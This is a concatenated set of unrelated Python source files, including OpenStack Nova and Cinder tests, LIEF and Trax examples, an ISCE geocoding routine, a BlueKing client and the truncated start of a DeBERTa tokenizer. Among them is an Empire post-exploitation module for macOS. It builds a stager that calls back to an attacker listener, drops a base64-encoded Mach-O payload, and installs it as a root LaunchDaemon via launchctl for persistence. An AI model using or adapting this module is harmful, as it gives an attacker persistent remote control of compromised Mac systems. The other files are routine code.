"""Get a list of instances with a subset of cell mappings."""
last_cell = self.cells[-1]
with context.target_cell(self.context, last_cell) as cctxt:
last_cell_instances = db.instance_get_all(cctxt)
last_cell_uuids = [inst['uuid'] for inst in last_cell_instances]
instances = list(
instance_list.get_instances_sorted(self.context, {},
None, None, [],
['uuid'], ['asc'],
cell_mappings=self.cells[:-1])
[1])
found_uuids = [inst['hostname'] for inst in instances]
had_uuids = [inst['hostname'] for inst in self.instances
if inst['uuid'] not in last_cell_uuids]
self.assertEqual(sorted(had_uuids), sorted(found_uuids))
class TestInstanceListObjects(test.TestCase):
def setUp(self):
super(TestInstanceListObjects, self).setUp()
self.context = context.RequestContext('fake', 'fake')
self.num_instances = 3
self.instances = []
start = datetime.datetime(1985, 10, 25, 1, 21, 0)
dt = start
spread = datetime.timedelta(minutes=10)
cells = objects.CellMappingList.get_all(self.context)
# Create three instances in each of the real cells. Leave the
# first cell empty to make sure we don't break with an empty
# one
for cell in cells[1:]:
for i in range(0, self.num_instances):
with context.target_cell(self.context, cell) as cctx:
inst = objects.Instance(
context=cctx,
project_id=self.context.project_id,
user_id=self.context.user_id,
created_at=start,
launched_at=dt,
instance_type_id=i,
hostname='%s-inst%i' % (cell.name, i))
inst.create()
if i % 2 == 0:
# Make some faults for this instance
for n in range(0, i + 1):
msg = 'fault%i-%s' % (n, inst.hostname)
f = objects.InstanceFault(context=cctx,
instance_uuid=inst.uuid,
code=i,
message=msg,
details='fake',
host='fakehost')
f.create()
self.instances.append(inst)
im = objects.InstanceMapping(context=self.context,
project_id=inst.project_id,
user_id=inst.user_id,
instance_uuid=inst.uuid,
cell_mapping=cell)
im.create()
dt += spread
def test_get_instance_objects_sorted(self):
filters = {}
limit = None
marker = None
expected_attrs = []
sort_keys = ['uuid']
sort_dirs = ['asc']
insts, down_cell_uuids = instance_list.get_instance_objects_sorted(
self.context, filters, limit, marker, expected_attrs,
sort_keys, sort_dirs)
found_uuids = [x.uuid for x in insts]
had_uuids = sorted([x['uuid'] for x in self.instances])
self.assertEqual(had_uuids, found_uuids)
# Make sure none of the instances have fault set
self.assertEqual(0, len([inst for inst in insts
if 'fault' in inst]))
def test_get_instance_objects_sorted_with_fault(self):
filters = {}
limit = None
marker = None
expected_attrs = ['fault']
sort_keys = ['uuid']
sort_dirs = ['asc']
insts, down_cell_uuids = instance_list.get_instance_objects_sorted(
self.context, filters, limit, marker, expected_attrs,
sort_keys, sort_dirs)
found_uuids = [x.uuid for x in insts]
had_uuids = sorted([x['uuid'] for x in self.instances])
self.assertEqual(had_uuids, found_uuids)
# They should all have fault set, but only some have
# actual faults
self.assertEqual(2, len([inst for inst in insts
if inst.fault]))
def test_get_instance_objects_sorted_paged(self):
"""Query a full first page and ensure an empty second one.
This uses created_at which is enforced to be the same across
each instance by setUp(). This will help make sure we still
have a stable ordering, even when we only claim to care about
created_at.
"""
instp1, down_cell_uuids = instance_list.get_instance_objects_sorted(
self.context, {}, None, None, [],
['created_at'], ['asc'])
self.assertEqual(len(self.instances), len(instp1))
instp2, down_cell_uuids = instance_list.get_instance_objects_sorted(
self.context, {}, None, instp1[-1]['uuid'], [],
['created_at'], ['asc'])
self.assertEqual(0, len(instp2))
|
examples/python/abstract_json.py
|
rafael-santiago/LIEF
| 2,999 |
64596
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Description
# -----------
# Dump abstract informations in a JSON format
# see: abstract_reader.py
import argparse
import sys
import lief
import json
def main():
parser = argparse.ArgumentParser()
parser.add_argument('binary', help = 'A binary')
args = parser.parse_args()
binary = lief.parse(args.binary)
json_data = json.loads(lief.to_json_from_abstract(binary))
print(json.dumps(json_data, sort_keys = True, indent = 4))
if __name__ == "__main__":
sys.exit(main())
|
bcs-ui/backend/resources/workloads/cronjob/client.py
|
laodiu/bk-bcs
| 599 |
64619
|
<reponame>laodiu/bk-bcs
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 TH<NAME>, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from backend.container_service.clusters.base.models import CtxCluster
from backend.resources.constants import DEFAULT_CRON_JOB_API_VERSION, K8sResourceKind
from backend.resources.resource import ResourceClient
from backend.resources.workloads.cronjob.formatter import CronJobFormatter
class CronJob(ResourceClient):
kind = K8sResourceKind.CronJob.value
formatter = CronJobFormatter()
def __init__(self, ctx_cluster: CtxCluster):
super().__init__(ctx_cluster=ctx_cluster, api_version=DEFAULT_CRON_JOB_API_VERSION)
|
trax/tf_numpy/public_symbol_test.py
|
dedsec-9/trax
| 7,220 |
64630
|
<gh_stars>1000+
# coding=utf-8
# Copyright 2021 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests different ways to use the public tf-numpy module."""
import numpy as onp
import tensorflow as tf
import tensorflow.experimental.numpy as np1
from tensorflow.experimental import numpy as np2 # pylint: disable=reimported
np3 = tf.experimental.numpy
class PublicSymbolTest(tf.test.TestCase):
def testSimple(self):
a = 0.1
b = 0.2
for op in [np1.add, np2.add, np3.add]:
self.assertAllClose(onp.add(a, b), op(a, b))
if __name__ == "__main__":
tf.compat.v1.enable_eager_execution()
tf.test.main()
|
lib/modules/python/persistence/osx/launchdaemonexecutable.py
|
Strazzom/Empire
| 230 |
64638
|
<gh_stars>100-1000
import base64
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'LaunchDaemon',
# list of one or more authors for the module
'Author': ['@xorrior'],
# more verbose multi-line description of the module
'Description': ('Installs an Empire launchDaemon.'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : None,
# if the module needs administrative privileges
'NeedsAdmin' : True,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required' : True,
'Value' : 'True'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'DaemonName' : {
'Description' : 'Name of the Launch Daemon to install. Name will also be used for the plist file.',
'Required' : True,
'Value' : 'com.proxy.initialize'
},
'DaemonLocation' : {
'Description' : 'The full path of where the Empire launch daemon should be located.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
daemonName = self.options['DaemonName']['Value']
programname = self.options['DaemonLocation']['Value']
plistfilename = "%s.plist" % daemonName
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
safeChecks = self.options['SafeChecks']['Value']
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
launcher = launcher.strip('echo').strip(' | python &').strip("\"")
machoBytes = self.mainMenu.stagers.generate_macho(launcherCode=launcher)
encBytes = base64.b64encode(machoBytes)
plistSettings = """
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0">
<plist version="1.0">
<dict>
<key>Label</key>
<string>%s</string>
<key>ProgramArguments</key>
<array>
<string>%s</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
""" % (daemonName, programname)
script = """
import subprocess
import sys
import base64
import os
encBytes = "%s"
bytes = base64.b64decode(encBytes)
plist = \"\"\"
%s
\"\"\"
daemonPath = "%s"
if not os.path.exists(os.path.split(daemonPath)[0]):
os.makedirs(os.path.split(daemonPath)[0])
e = open(daemonPath,'wb')
e.write(bytes)
e.close()
os.chmod(daemonPath, 0777)
f = open('/tmp/%s','w')
f.write(plist)
f.close()
process = subprocess.Popen('chmod 644 /tmp/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
process = subprocess.Popen('chown -R root /tmp/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
process = subprocess.Popen('chown :wheel /tmp/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
process = subprocess.Popen('mv /tmp/%s /Library/LaunchDaemons/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
process = subprocess.Popen('launchctl load /Library/LaunchDaemons/%s', stdout=subprocess.PIPE, shell=True)
process.communicate()
print "\\n[+] Persistence has been installed: /Library/LaunchDaemons/%s"
print "\\n[+] Empire daemon has been written to %s"
""" % (encBytes,plistSettings, programname, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, programname)
return script
|
cinder/tests/unit/scheduler/test_capacity_weigher.py
|
helenwalsh/cinder
| 571 |
64668
|
# Copyright 2011-2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests For Capacity Weigher."""
from datetime import datetime
from unittest import mock
import ddt
from cinder.common import constants
from cinder import context
from cinder.scheduler import weights
from cinder.tests.unit.scheduler import fakes
from cinder.tests.unit import test
from cinder.volume import volume_utils
@ddt.ddt
class CapacityWeigherTestCase(test.TestCase):
def setUp(self):
super(CapacityWeigherTestCase, self).setUp()
self.host_manager = fakes.FakeHostManager()
self.weight_handler = weights.OrderedHostWeightHandler(
'cinder.scheduler.weights')
def _get_weighed_hosts(self, hosts, weight_properties=None):
if weight_properties is None:
weight_properties = {'size': 1}
return self.weight_handler.get_weighed_objects(
[weights.capacity.CapacityWeigher],
hosts,
weight_properties)
@mock.patch('cinder.db.sqlalchemy.api.service_get_all')
def _get_all_backends(self, _mock_service_get_all, disabled=False):
ctxt = context.get_admin_context()
fakes.mock_host_manager_db_calls(_mock_service_get_all,
disabled=disabled)
backend_states = self.host_manager.get_all_backend_states(ctxt)
_mock_service_get_all.assert_called_once_with(
ctxt,
None, # backend_match_level
topic=constants.VOLUME_TOPIC, frozen=False, disabled=disabled)
return backend_states
# If thin and thin_provisioning_support are True,
# use the following formula:
# free = (total * host_state.max_over_subscription_ratio
# - host_state.provisioned_capacity_gb
# - math.floor(total * reserved))
# Otherwise, use the following formula:
# free = free_space - math.floor(total * reserved)
@ddt.data(
{'volume_type': {'extra_specs': {'provisioning:type': 'thin'}},
'winner': 'host2'},
{'volume_type': {'extra_specs': {'provisioning:type': 'thick'}},
'winner': 'host1'},
{'volume_type': {'extra_specs': {}},
'winner': 'host2'},
{'volume_type': {},
'winner': 'host2'},
{'volume_type': None,
'winner': 'host2'},
)
@ddt.unpack
def test_default_of_spreading_first(self, volume_type, winner):
backend_info_list = self._get_all_backends()
# Results for the 1st test
# {'provisioning:type': 'thin'}:
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=1024-math.floor(1024*0.1)=922
# Norm=0.837837837838
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=2048*1.5-1748-math.floor(2048*0.1)=1120
# Norm=1.0
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=256-512*0=256
# Norm=0.292383292383
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=2048*1.0-2047-math.floor(2048*0.05)=-101
# Norm=0.0
# host5: free_capacity_gb=unknown free=-1
# Norm=0.0819000819001
# so, host2 should win:
weight_properties = {
'size': 1,
'volume_type': volume_type,
}
weighed_host = self._get_weighed_hosts(
backend_info_list,
weight_properties=weight_properties)[0]
self.assertEqual(1.0, weighed_host.weight)
self.assertEqual(winner,
volume_utils.extract_host(weighed_host.obj.host))
@ddt.data(
{'volume_type': {'extra_specs': {'provisioning:type': 'thin'}},
'winner': 'host4'},
{'volume_type': {'extra_specs': {'provisioning:type': 'thick'}},
'winner': 'host2'},
{'volume_type': {'extra_specs': {}},
'winner': 'host4'},
{'volume_type': {},
'winner': 'host4'},
{'volume_type': None,
'winner': 'host4'},
)
@ddt.unpack
def test_capacity_weight_multiplier1(self, volume_type, winner):
self.flags(capacity_weight_multiplier=-1.0)
backend_info_list = self._get_all_backends()
# Results for the 1st test
# {'provisioning:type': 'thin'}:
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=-(1024-math.floor(1024*0.1))=-922
# Norm=-0.00829542413701
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=-(2048*1.5-1748-math.floor(2048*0.1))=-1120
# Norm=-0.00990099009901
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=-(256-512*0)=-256
# Norm=--0.002894884083
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=-(2048*1.0-2047-math.floor(2048*0.05))=101
# Norm=0.0
# host5: free_capacity_gb=unknown free=-float('inf')
# Norm=-1.0
# so, host4 should win:
weight_properties = {
'size': 1,
'volume_type': volume_type,
}
weighed_host = self._get_weighed_hosts(
backend_info_list,
weight_properties=weight_properties)
weighed_host = weighed_host[0]
self.assertEqual(0.0, weighed_host.weight)
self.assertEqual(winner,
volume_utils.extract_host(weighed_host.obj.host))
@ddt.data(
{'volume_type': {'extra_specs': {'provisioning:type': 'thin'}},
'winner': 'host2'},
{'volume_type': {'extra_specs': {'provisioning:type': 'thick'}},
'winner': 'host1'},
{'volume_type': {'extra_specs': {}},
'winner': 'host2'},
{'volume_type': {},
'winner': 'host2'},
{'volume_type': None,
'winner': 'host2'},
)
@ddt.unpack
def test_capacity_weight_multiplier2(self, volume_type, winner):
self.flags(capacity_weight_multiplier=2.0)
backend_info_list = self._get_all_backends()
# Results for the 1st test
# {'provisioning:type': 'thin'}:
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=(1024-math.floor(1024*0.1))*2=1844
# Norm=1.67567567568
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=(2048*1.5-1748-math.floor(2048*0.1))*2=2240
# Norm=2.0
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=(256-512*0)*2=512
# Norm=0.584766584767
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=(2048*1.0-2047-math.floor(2048*0.05))*2=-202
# Norm=0.0
# host5: free_capacity_gb=unknown free=-2
# Norm=0.1638001638
# so, host2 should win:
weight_properties = {
'size': 1,
'volume_type': volume_type,
}
weighed_host = self._get_weighed_hosts(
backend_info_list,
weight_properties=weight_properties)[0]
self.assertEqual(1.0 * 2, weighed_host.weight)
self.assertEqual(winner,
volume_utils.extract_host(weighed_host.obj.host))
def test_capacity_weight_no_unknown_or_infinite(self):
self.flags(capacity_weight_multiplier=-1.0)
del self.host_manager.service_states['host5']
backend_info_list = self._get_all_backends()
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=(1024-math.floor(1024*0.1))=-922
# Norm=-0.837837837838
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
# Norm=-1.0
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=(256-512*0)=-256
# Norm=-0.292383292383
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=(2048*1.0-2047-math.floor(2048*0.05))=101
# Norm=0.0
# so, host4 should win:
weighed_hosts = self._get_weighed_hosts(backend_info_list)
best_host = weighed_hosts[0]
self.assertEqual(0.0, best_host.weight)
self.assertEqual('host4',
volume_utils.extract_host(best_host.obj.host))
# and host2 is the worst:
worst_host = weighed_hosts[-1]
self.assertEqual(-1.0, worst_host.weight)
self.assertEqual('host2',
volume_utils.extract_host(worst_host.obj.host))
def test_capacity_weight_free_unknown(self):
self.flags(capacity_weight_multiplier=-1.0)
self.host_manager.service_states['host5'] = {
'total_capacity_gb': 3000,
'free_capacity_gb': 'unknown',
'allocated_capacity_gb': 1548,
'provisioned_capacity_gb': 1548,
'max_over_subscription_ratio': 1.0,
'thin_provisioning_support': True,
'thick_provisioning_support': False,
'reserved_percentage': 5,
'timestamp': datetime.utcnow()}
backend_info_list = self._get_all_backends()
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=(1024-math.floor(1024*0.1))=-922
# Norm= -0.00829542413701
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
# Norm=-0.00990099009901
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=(256-512*0)=-256
# Norm=-0.002894884083
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=(2048*1.0-2047-math.floor(2048*0.05))=101
# Norm=0.0
# host5: free_capacity_gb=unknown free=3000
# Norm=-1.0
# so, host4 should win:
weighed_hosts = self._get_weighed_hosts(backend_info_list)
best_host = weighed_hosts[0]
self.assertEqual(0.0, best_host.weight)
self.assertEqual('host4',
volume_utils.extract_host(best_host.obj.host))
# and host5 is the worst:
worst_host = weighed_hosts[-1]
self.assertEqual(-1.0, worst_host.weight)
self.assertEqual('host5',
volume_utils.extract_host(worst_host.obj.host))
def test_capacity_weight_cap_unknown(self):
self.flags(capacity_weight_multiplier=-1.0)
self.host_manager.service_states['host5'] = {
'total_capacity_gb': 'unknown',
'free_capacity_gb': 3000,
'allocated_capacity_gb': 1548,
'provisioned_capacity_gb': 1548,
'max_over_subscription_ratio': 1.0,
'thin_provisioning_support': True,
'thick_provisioning_support': False,
'reserved_percentage': 5,
'timestamp': datetime.utcnow()}
backend_info_list = self._get_all_backends()
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=(1024-math.floor(1024*0.1))=-922
# Norm= -0.00829542413701
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
# Norm=-0.00990099009901
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=(256-512*0)=-256
# Norm=-0.002894884083
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=(2048*1.0-2047-math.floor(2048*0.05))=101
# Norm=0.0
# host5: free_capacity_gb=3000 free=unknown
# Norm=-1.0
# so, host4 should win:
weighed_hosts = self._get_weighed_hosts(backend_info_list)
best_host = weighed_hosts[0]
self.assertEqual(0.0, best_host.weight)
self.assertEqual('host4',
volume_utils.extract_host(best_host.obj.host))
# and host5 is the worst:
worst_host = weighed_hosts[-1]
self.assertEqual(-1.0, worst_host.weight)
self.assertEqual('host5',
volume_utils.extract_host(worst_host.obj.host))
def test_capacity_weight_free_infinite(self):
self.flags(capacity_weight_multiplier=-1.0)
self.host_manager.service_states['host5'] = {
'total_capacity_gb': 3000,
'free_capacity_gb': 'infinite',
'allocated_capacity_gb': 1548,
'provisioned_capacity_gb': 1548,
'max_over_subscription_ratio': 1.0,
'thin_provisioning_support': True,
'thick_provisioning_support': False,
'reserved_percentage': 5,
'timestamp': datetime.utcnow()}
backend_info_list = self._get_all_backends()
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=(1024-math.floor(1024*0.1))=-922
# Norm= -0.00829542413701
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
# Norm=-0.00990099009901
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=(256-512*0)=-256
# Norm=-0.002894884083
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=(2048*1.0-2047-math.floor(2048*0.05))=101
# Norm=0.0
# host5: free_capacity_gb=infinite free=3000
# Norm=-1.0
# so, host4 should win:
weighed_hosts = self._get_weighed_hosts(backend_info_list)
best_host = weighed_hosts[0]
self.assertEqual(0.0, best_host.weight)
self.assertEqual('host4',
volume_utils.extract_host(best_host.obj.host))
# and host5 is the worst:
worst_host = weighed_hosts[-1]
self.assertEqual(-1.0, worst_host.weight)
self.assertEqual('host5',
volume_utils.extract_host(worst_host.obj.host))
def test_capacity_weight_cap_infinite(self):
self.flags(capacity_weight_multiplier=-1.0)
self.host_manager.service_states['host5'] = {
'total_capacity_gb': 'infinite',
'free_capacity_gb': 3000,
'allocated_capacity_gb': 1548,
'provisioned_capacity_gb': 1548,
'max_over_subscription_ratio': 1.0,
'thin_provisioning_support': True,
'thick_provisioning_support': False,
'reserved_percentage': 5,
'timestamp': datetime.utcnow()}
backend_info_list = self._get_all_backends()
# host1: thin_provisioning_support = False
# free_capacity_gb=1024,
# free=(1024-math.floor(1024*0.1))=-922
# Norm= -0.00829542413701
# host2: thin_provisioning_support = True
# free_capacity_gb=300,
# free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
# Norm=-0.00990099009901
# host3: thin_provisioning_support = False
# free_capacity_gb=512, free=(256-512*0)=-256
# Norm=-0.002894884083
# host4: thin_provisioning_support = True
# free_capacity_gb=200,
# free=(2048*1.0-2047-math.floor(2048*0.05))=101
# Norm=0.0
# host5: free_capacity_gb=3000 free=infinite
# Norm=-1.0
# so, host4 should win:
weighed_hosts = self._get_weighed_hosts(backend_info_list)
best_host = weighed_hosts[0]
self.assertEqual(0.0, best_host.weight)
self.assertEqual('host4',
volume_utils.extract_host(best_host.obj.host))
# and host5 is the worst:
worst_host = weighed_hosts[-1]
self.assertEqual(-1.0, worst_host.weight)
self.assertEqual('host5',
volume_utils.extract_host(worst_host.obj.host))
|
components/isceobj/IsceProc/runGeocode.py
|
vincentschut/isce2
| 1,133 |
64673
|
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2014 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Authors: <NAME>, <NAME>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Comment: Adapted from InsarProc/runGeocode.py
import logging
import stdproc
from stdproc.rectify.geocode.Geocodable import Geocodable
import isceobj
#from contextlib import nested
from iscesys.ImageUtil.ImageUtil import ImageUtil as IU
from iscesys.StdOEL.StdOELPy import create_writer
import os
logger = logging.getLogger('isce.isceProc.runGeocode')
posIndx = 1
def runGeocode(self, prodlist, unwrapflag, bbox):
'''Generalized geocoding of all the files listed above (in prodlist).'''
if isinstance(prodlist, str):
from isceobj.Util.StringUtils import StringUtils as SU
tobeGeocoded = SU.listify(prodlist)
else:
tobeGeocoded = prodlist
#####Remove the unwrapped interferogram if no unwrapping is done
if not unwrapflag:
try:
tobeGeocoded.remove(self._isce.unwrappedIntFilename)
except ValueError:
pass
print('Number of products to geocode: ', len(tobeGeocoded))
stdWriter = create_writer("log", "", True, filename="geo.log")
velocity, height = self._isce.vh()
if bbox is not None:
snwe = list(bbox)
if len(snwe) != 4:
raise valueError('Bounding box should be a list/tuple of length 4')
else:
snwe = self._isce.topo.snwe
infos = {}
for attribute in ['demCropFilename', 'numberRangeLooks', 'numberAzimuthLooks',
'is_mocomp', 'demImage', 'peg', 'dopplerCentroid']:
infos[attribute] = getattr(self._isce, attribute)
for sceneid1, sceneid2 in self._isce.selectedPairs:
pair = (sceneid1, sceneid2)
for pol in self._isce.selectedPols:
frame1 = self._isce.frames[sceneid1][pol]
formSLC1 = self._isce.formSLCs[sceneid1][pol]
sid = self._isce.formatname(pair, pol)
infos['outputPath'] = os.path.join(self.getoutputdir(sceneid1, sceneid2), sid)
catalog = isceobj.Catalog.createCatalog(self._isce.procDoc.name)
run(tobeGeocoded, frame1, formSLC1, velocity, height, snwe, infos, catalog=catalog, sceneid=sid)
self._isce.procDoc.addAllFromCatalog(catalog)
def run(tobeGeocoded, frame1, formSLC1, velocity, height, snwe, infos, catalog=None, sceneid='NO_ID'):
logger.info("Geocoding Image: %s" % sceneid)
stdWriter = create_writer("log", "", True, filename=infos['outputPath'] + ".geo.log")
planet = frame1.getInstrument().getPlatform().getPlanet()
doppler = infos['dopplerCentroid'].getDopplerCoefficients(inHz=False)[0]
#####Geocode one by one
for prod in tobeGeocoded:
prodPath = infos['outputPath'] + '.' + prod
if not os.path.isfile(prodPath):
logger.info("File not found. Skipping %s" % prodPath) #KK some prods are only in refScene folder! (tbd)
continue
#else:
objGeo = stdproc.createGeocode('insarapp_geocode_' + os.path.basename(prod).replace('.',''))
objGeo.configure()
objGeo.referenceOrbit = formSLC1.getMocompPosition(posIndx)
####IF statements to check for user configuration
if objGeo.minimumLatitude is None:
objGeo.minimumLatitude = snwe[0]
if objGeo.maximumLatitude is None:
objGeo.maximumLatitude = snwe[1]
if objGeo.minimumLongitude is None:
objGeo.minimumLongitude = snwe[2]
if objGeo.maximumLongitude is None:
objGeo.maximumLongitude = snwe[3]
if objGeo.demCropFilename is None:
objGeo.demCropFilename = infos['outputPath'] + '.' + infos['demCropFilename']
if objGeo.dopplerCentroidConstantTerm is None:
objGeo.dopplerCentroidConstantTerm = doppler
if objGeo.bodyFixedVelocity is None:
objGeo.bodyFixedVelocity = velocity
if objGeo.spacecraftHeight is None:
objGeo.spacecraftHeight = height
if objGeo.numberRangeLooks is None:
objGeo.numberRangeLooks = infos['numberRangeLooks']
if objGeo.numberAzimuthLooks is None:
objGeo.numberAzimuthLooks = infos['numberAzimuthLooks']
if objGeo.isMocomp is None:
objGeo.isMocomp = infos['is_mocomp']
objGeo.stdWriter = stdWriter
#create the instance of the image and return the method is supposed to use
ge = Geocodable()
inImage, objGeo.method = ge.create(prodPath)
if objGeo.method is None:
objGeo.method = method
if inImage:
demImage = isceobj.createDemImage()
IU.copyAttributes(infos['demImage'], demImage)
objGeo(peg=infos['peg'], frame=frame1,
planet=planet, dem=demImage, tobegeocoded=inImage,
geoPosting=None, referenceslc=formSLC1)
if catalog is not None:
isceobj.Catalog.recordInputsAndOutputs(catalog, objGeo,
"runGeocode.%s.%s" % (sceneid, prodPath),
logger,
"runGeocode.%s.%s" % (sceneid, prodPath))
stdWriter.finalize()
|
src/transformers/models/deberta_v2/tokenization_deberta_v2_fast.py
|
techthiyanes/transformers
| 8,028 |
64705
|
# coding=utf-8
# Copyright 2020 Microsoft and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fast Tokenization class for model DeBERTa."""
import os
from shutil import copyfile
from typing import Optional, Tuple
from ...file_utils import is_sentencepiece_available
from ...tokenization_utils_fast import PreTrainedTokenizerFast
from ...utils import logging
if is_sentencepiece_available():
from .tokenization_deberta_v2 import DebertaV2Tokenizer
else:
DebertaV2Tokenizer = None
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "spm.model", "tokenizer_file": "tokenizer.json"}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"microsoft/deberta-v2-xlarge": "https://huggingface.co/microsoft/deberta-v2-xlarge/resolve/main/spm.model",
"microsoft/deberta-v2-xxlarge": "https://huggingface.co/microsoft/deberta-v2-xxlarge/resolve/main/spm.model",
"microsoft/deberta-v2-xlarge-mnli": "https://huggingface.co/microsoft/deberta-v2-xlarge-mnli/resolve/main/spm.model",
"microsoft/deberta-v2-xxlarge-mnli": "https://huggingface.co/microsoft/deberta-v2-xxlarge-mnli/resolve/main/spm.model",
}
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
